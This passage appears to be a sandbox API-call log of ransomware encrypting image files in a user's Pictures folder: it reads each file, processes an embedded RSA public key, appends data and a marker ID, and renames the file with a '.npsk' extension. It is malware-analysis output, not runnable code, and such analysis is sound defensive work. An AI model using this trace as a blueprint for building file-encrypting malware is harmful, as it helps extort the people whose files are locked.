flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.736] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xde8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.736] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.738] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xe0e, lpOverlapped=0x0) returned 1 [0215.738] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.738] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.738] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.738] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b2018) returned 1 [0215.739] CryptCreateHash (in: hProv=0x7b2018, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.739] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.739] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.739] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.739] GetLastError () returned 0x0 [0215.739] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.739] CryptReleaseContext (hProv=0x7b2018, dwFlags=0x0) returned 1 [0215.739] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.739] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.740] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.740] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0215.740] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xe0e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.740] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.740] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.740] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.741] CloseHandle (hObject=0x61c) returned 1 [0215.744] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l3X0rIq0ylmfa7Fmqc.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l3x0riq0ylmfa7fmqc.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l3X0rIq0ylmfa7Fmqc.gif.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l3x0riq0ylmfa7fmqc.gif.npsk")) returned 1 [0215.745] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e5a7e80, ftCreationTime.dwHighDateTime=0x1d5e4b1, ftLastAccessTime.dwLowDateTime=0xd99fda40, ftLastAccessTime.dwHighDateTime=0x1d5e392, ftLastWriteTime.dwLowDateTime=0xd99fda40, ftLastWriteTime.dwHighDateTime=0x1d5e392, nFileSizeHigh=0x0, nFileSizeLow=0xca6b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lMQl3vtPbVw.bmp", cAlternateFileName="LMQL3V~1.BMP")) returned 1 [0215.746] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lMQl3vtPbVw.bmp") returned=".bmp" [0215.746] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lMQl3vtPbVw.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lmql3vtpbvw.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.746] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=51819) returned 1 [0215.746] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.748] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xca45, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.748] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.750] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xca6b, lpOverlapped=0x0) returned 1 [0215.751] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.751] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.751] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.751] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0215.752] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.752] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.752] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.752] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.752] GetLastError () returned 0x0 [0215.752] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.752] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0215.752] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.752] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.752] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.753] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0215.753] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xca6b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.754] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.754] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.754] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.754] CloseHandle (hObject=0x61c) returned 1 [0215.762] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lMQl3vtPbVw.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lmql3vtpbvw.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lMQl3vtPbVw.bmp.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lmql3vtpbvw.bmp.npsk")) returned 1 [0215.763] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1460ff0, ftCreationTime.dwHighDateTime=0x1d5e2b9, ftLastAccessTime.dwLowDateTime=0xce6c4f80, ftLastAccessTime.dwHighDateTime=0x1d5e083, ftLastWriteTime.dwLowDateTime=0xce6c4f80, ftLastWriteTime.dwHighDateTime=0x1d5e083, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S-r24cctxl", cAlternateFileName="S-R24C~1")) returned 1 [0215.764] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1ac38c0, ftCreationTime.dwHighDateTime=0x1d5dcfb, ftLastAccessTime.dwLowDateTime=0x4b19c0c0, ftLastAccessTime.dwHighDateTime=0x1d5dce8, ftLastWriteTime.dwLowDateTime=0x4b19c0c0, ftLastWriteTime.dwHighDateTime=0x1d5dce8, nFileSizeHigh=0x0, nFileSizeLow=0x4352, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T1R4MLRFaG-Q.png", cAlternateFileName="T1R4ML~1.PNG")) returned 1 [0215.764] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T1R4MLRFaG-Q.png") returned=".png" [0215.764] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T1R4MLRFaG-Q.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t1r4mlrfag-q.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.765] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=17234) returned 1 [0215.765] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.767] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x432c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.767] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.769] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x4352, lpOverlapped=0x0) returned 1 [0215.770] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.770] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.770] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.770] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 [0215.771] CryptCreateHash (in: hProv=0x7b1f90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.771] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.771] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.771] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.771] GetLastError () returned 0x0 [0215.771] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.771] CryptReleaseContext (hProv=0x7b1f90, dwFlags=0x0) returned 1 [0215.772] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.772] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.772] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.772] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8b1c8 [0215.773] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x4352, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.773] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.773] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.773] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.773] CloseHandle (hObject=0x61c) returned 1 [0215.781] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T1R4MLRFaG-Q.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t1r4mlrfag-q.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\T1R4MLRFaG-Q.png.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\t1r4mlrfag-q.png.npsk")) returned 1 [0215.783] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9e6a260, ftCreationTime.dwHighDateTime=0x1d5df82, ftLastAccessTime.dwLowDateTime=0x59132c20, ftLastAccessTime.dwHighDateTime=0x1d5e382, ftLastWriteTime.dwLowDateTime=0x59132c20, ftLastWriteTime.dwHighDateTime=0x1d5e382, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WVIC0My", cAlternateFileName="")) returned 1 [0215.783] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7c82060, ftCreationTime.dwHighDateTime=0x1d5ddb4, ftLastAccessTime.dwLowDateTime=0xff9ba470, ftLastAccessTime.dwHighDateTime=0x1d5dd9a, ftLastWriteTime.dwLowDateTime=0xff9ba470, ftLastWriteTime.dwHighDateTime=0x1d5dd9a, nFileSizeHigh=0x0, nFileSizeLow=0x146d2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ywKsook.png", cAlternateFileName="")) returned 1 [0215.783] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ywKsook.png") returned=".png" [0215.784] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ywKsook.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ywksook.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.784] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=83666) returned 1 [0215.784] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.786] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x146ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.786] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.788] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x146d2, lpOverlapped=0x0) returned 1 [0215.789] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.789] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.789] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.789] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1f90) returned 1 